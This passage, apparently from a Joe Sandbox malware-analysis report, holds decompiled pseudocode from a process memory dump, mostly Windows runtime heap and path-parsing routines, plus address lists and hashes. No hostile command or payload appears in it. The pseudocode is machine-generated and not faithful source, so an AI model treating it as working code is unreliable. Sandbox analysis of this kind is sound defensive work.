								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x46d60e8;
								if( *0x46d60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x46d60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04629710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04626DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0462F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0462F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0462F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0462FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0462FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0462F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0462F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E046B4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0463D130(_t427, _t494, _t511);
				}
			}

0x046b5ba5
0x046b5baa
0x046b5baf
0x046b5bb4
0x046b5bb6
0x046b5bbc
0x046b5bbe
0x046b5bc4
0x046b5bcd
0x046b5bd3
0x046b5bd6
0x046b5bdc
0x046b5be0
0x046b5be3
0x046b5beb
0x046b5bf2
0x046b5bf8
0x046b5bfe
0x046b5c04
0x046b5c0e
0x046b5c18
0x046b5c1f
0x046b5c25
0x046b5c2a
0x046b5c2c
0x046b5c32
0x046b5c3a
0x046b5c3f
0x046b5c42
0x046b5c48
0x046b5c5b
0x046b5c5b
0x046b5c2c
0x046b5cb7
0x046b5cb9
0x046b5cbf
0x046b5cc2
0x046b5cca
0x046b5ccb
0x046b5ccb
0x046b5cd1
0x046b5cd7
0x046b5cda
0x046b5ce1
0x046b5ce4
0x046b5ce7
0x046b5ced
0x046b5cf3
0x046b5cf9
0x046b5cff
0x046b5d08
0x046b5d0a
0x046b5d0e
0x046b5d10
0x00000000
0x00000000
0x046b5d16
0x046b5d1a
0x00000000
0x00000000
0x046b5d20
0x046b5d22
0x046b5d25
0x046b5d2f
0x046b5d2f
0x046b5d33
0x046b5d3d
0x046b5d49
0x046b5d4b
0x00000000
0x00000000
0x046b5d5a
0x046b5d5d
0x046b5d60
0x00000000
0x00000000
0x046b5d66
0x046b5d69
0x00000000
0x00000000
0x046b5d6f
0x046b5d6f
0x046b5d73
0x046b5d79
0x046b5d7f
0x046b5d86
0x046b5d95
0x046b5d98
0x046b5dba
0x046b5dcb
0x046b5dce
0x046b5dd3
0x046b5dd6
0x046b5dd8
0x046b5de6
0x046b5dec
0x046b5dee
0x046b5df1
0x046b5df3
0x046b635a
0x046b635a
0x00000000
0x046b635a
0x046b5dfe
0x046b5e02
0x046b5e05
0x046b5e07
0x046b5e10
0x046b5e13
0x046b5e1b
0x046b5e1c
0x046b5e21
0x046b5e22
0x046b5e23
0x046b5e25
0x046b5e2a
0x046b5e2c
0x046b5e2e
0x046b5e36
0x046b5e39
0x046b5e42
0x046b5e47
0x046b5e4d
0x046b5e54
0x046b5e54
0x046b5e54
0x046b5e2e
0x046b5e5c
0x046b5e5f
0x046b5e62
0x046b5e64
0x046b5e6b
0x046b5e70
0x046b5e7a
0x046b5e7a
0x046b5e7a
0x046b5e6b
0x046b5e7e
0x046b5e7f
0x046b5e7f
0x046b5e81
0x046b5e87
0x046b5e8b
0x046b5e8c
0x046b5e8c
0x046b5e8c
0x046b5e9a
0x046b5e9c
0x046b5ea2
0x046b5ea6
0x046b5f50
0x046b5f50
0x046b5f57
0x046b5f66
0x046b5f66
0x046b5f66
0x046b5f68
0x046b5f6a
0x046b63d0
0x00000000
0x046b5f70
0x046b5f70
0x046b5f91
0x046b5f9c
0x046b5f9e
0x046b5fa4
0x046b5fa6
0x046b638c
0x046b6392
0x046b63a1
0x046b63a7
0x046b63af
0x046b63af
0x046b63bd
0x046b63d8
0x00000000
0x046b63d8
0x046b5fac
0x046b5fb2
0x046b5fb4
0x046b5fbd
0x046b5fc6
0x046b5fce
0x046b5fd4
0x046b5fdc
0x046b5fec
0x046b5fed
0x046b5fee
0x046b5fef
0x046b5ff9
0x046b5ffa
0x046b5ffb
0x046b5ffc
0x046b6000
0x046b6004
0x046b6012
0x046b6012
0x046b6018
0x046b6019
0x046b601a
0x046b601b
0x046b601c
0x046b6020
0x046b6059
0x046b605c
0x046b6061
0x046b6061
0x046b6022
0x046b6022
0x046b6022
0x046b6025
0x046b602a
0x046b602b
0x046b6031
0x046b6037
0x046b6038
0x046b603e
0x046b6048
0x046b6049
0x046b604a
0x046b604b
0x046b604c
0x046b604d
0x046b6053
0x046b6054
0x046b6054
0x046b6062
0x046b6065
0x046b6067
0x046b606a
0x046b6070
0x046b6075
0x046b6076
0x046b6081
0x046b6087
0x046b6095
0x046b6099
0x046b609e
0x046b60a4
0x046b60ae
0x046b60b0
0x046b60b3
0x046b60b6
0x046b60b8
0x046b60ba
0x046b60ba
0x046b60ba
0x046b60ba
0x046b60be
0x046b60c0
0x046b60c5
0x046b60c5
0x046b60c5
0x046b60c6
0x046b60cd
0x046b6114
0x046b60cf
0x046b60cf
0x046b60d4
0x046b60d5
0x046b60da
0x046b60db
0x046b60e1
0x046b60e2
0x046b60e8
0x046b60f8
0x046b60fd
0x046b60fe
0x046b6102
0x046b6104
0x046b6107
0x046b6109
0x046b610b
0x046b610b
0x046b610b
0x046b610b
0x046b610f
0x046b610f
0x046b6117
0x046b611a
0x046b611f
0x046b6125
0x046b6134
0x046b6139
0x046b613f
0x046b6146
0x046b6148
0x046b614b
0x046b614d
0x046b614f
0x046b614f
0x046b614f
0x046b614f
0x046b6153
0x046b6159
0x046b6159
0x046b615c
0x046b6163
0x046b6169
0x046b616c
0x046b6172
0x046b6181
0x046b6186
0x046b6187
0x046b618b
0x046b6191
0x046b6195
0x046b61a3
0x046b61bb
0x046b61c0
0x046b61c3
0x046b61cc
0x046b61d0
0x046b61dc
0x046b61de
0x046b61e1
0x046b61e4
0x046b61e6
0x046b61e8
0x046b61e8
0x046b61e8
0x046b61e8
0x046b61e6
0x046b61ec
0x046b61f3
0x046b6203
0x046b6209
0x046b620a
0x046b6216
0x046b621d
0x046b6227
0x046b6241
0x046b6246
0x046b624c
0x046b6257
0x046b6259
0x046b625c
0x046b625e
0x046b6260
0x046b6260
0x046b6260
0x046b6260
0x046b625e
0x046b6264
0x046b6267
0x046b6269
0x046b6315
0x046b6315
0x046b631b
0x046b631e
0x046b6324
0x046b6327
0x046b632f
0x046b6330
0x046b6333
0x046b633a
0x046b633c
0x046b6335
0x046b6335
0x046b6335
0x046b633f
0x046b6342
0x046b634c
0x046b6352
0x046b6355
0x046b6355
0x046b6359
0x00000000
0x046b626f
0x046b6275
0x046b6275
0x046b6278
0x046b627e
0x046b627e
0x046b6281
0x046b6287
0x046b628d
0x046b6298
0x046b629c
0x046b62a2
0x046b629e
0x046b629e
0x046b629e
0x046b62a7
0x046b62a7
0x046b62aa
0x046b62b0
0x046b62f0
0x046b62f0
0x046b62f2
0x046b62f8
0x046b62fd
0x046b62b2
0x046b62b2
0x046b62b2
0x046b62b5
0x046b62dd
0x046b62e2
0x046b62e5
0x046b62b7
0x046b62b8
0x046b62bb
0x046b62bd
0x046b62c0
0x046b62c4
0x046b62cd
0x046b62cd
0x046b62c0
0x046b62bb
0x046b62b5
0x046b6302
0x046b6303
0x046b6305
0x046b6305
0x046b6305
0x046b630c
0x046b630c
0x00000000
0x046b627e
0x046b6269
0x046b5eac
0x046b5ebb
0x046b5ebe
0x046b5ecb
0x046b5ecb
0x046b5ece
0x046b5ece
0x046b5ed4
0x046b5ed7
0x046b5ed9
0x046b5edb
0x046b5edb
0x046b5ee1
0x046b5ee1
0x046b5ee3
0x046b5f20
0x046b5f20
0x046b5ee5
0x046b5ee5
0x046b5ee5
0x046b5ee8
0x046b5f11
0x046b5f18
0x046b5eea
0x046b5eea
0x046b5eed
0x046b5ef2
0x046b5ef8
0x046b5efb
0x046b5f0a
0x046b5f0a
0x046b5eed
0x046b5ee8
0x046b5f22
0x046b5f28
0x00000000
0x00000000
0x046b5f30
0x046b5f31
0x046b5f37
0x046b5f3a
0x046b5f3d
0x046b5f44
0x00000000
0x00000000
0x00000000
0x046b5f46
0x046b5f48
0x046b5f4d
0x00000000
0x046b5f4d
0x046b5dda
0x046b5ddf
0x00000000
0x046b5ddf
0x046b5dd8
0x046b5da7
0x046b5da9
0x046b5dac
0x046b5dae
0x00000000
0x046b5db4
0x046b5db4
0x00000000
0x046b5db4
0x046b5dae
0x046b5d88
0x046b5d8d
0x046b6363
0x046b6369
0x046b636a
0x046b6370
0x046b6372
0x046b637a
0x046b637b
0x046b637d
0x00000000
0x00000000
0x046b637f
0x046b6385
0x00000000
0x046b6385
0x046b5d38
0x046b5d3b
0x00000000
0x00000000
0x00000000
0x046b5d3b
0x046b5d27
0x046b5d29
0x00000000
0x00000000
0x00000000
0x046b6360
0x00000000
0x046b6360
0x046b5c10
0x046b5c10
0x046b63da
0x046b63e5
0x046b63e5

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 681e15692a7ccd4ce1963a183fd34911d401a21141cfb26e92b3066b6bc32bd2
Instruction ID: b78c736841d1689d5ea11af7c3e6e6b734a83f249b4cb3b62d84f96c3d168a2d
Opcode Fuzzy Hash: 681e15692a7ccd4ce1963a183fd34911d401a21141cfb26e92b3066b6bc32bd2
Instruction Fuzzy Hash: 94424C71900229DFDB24CF68C980BE9B7B1FF55304F1481AAD98DAB342E734A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04604120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04604120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x46dd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0461F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04606E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04604620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04606E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M046045F8))) {
												case 0:
													_v568 = 0x45c1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x45c11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
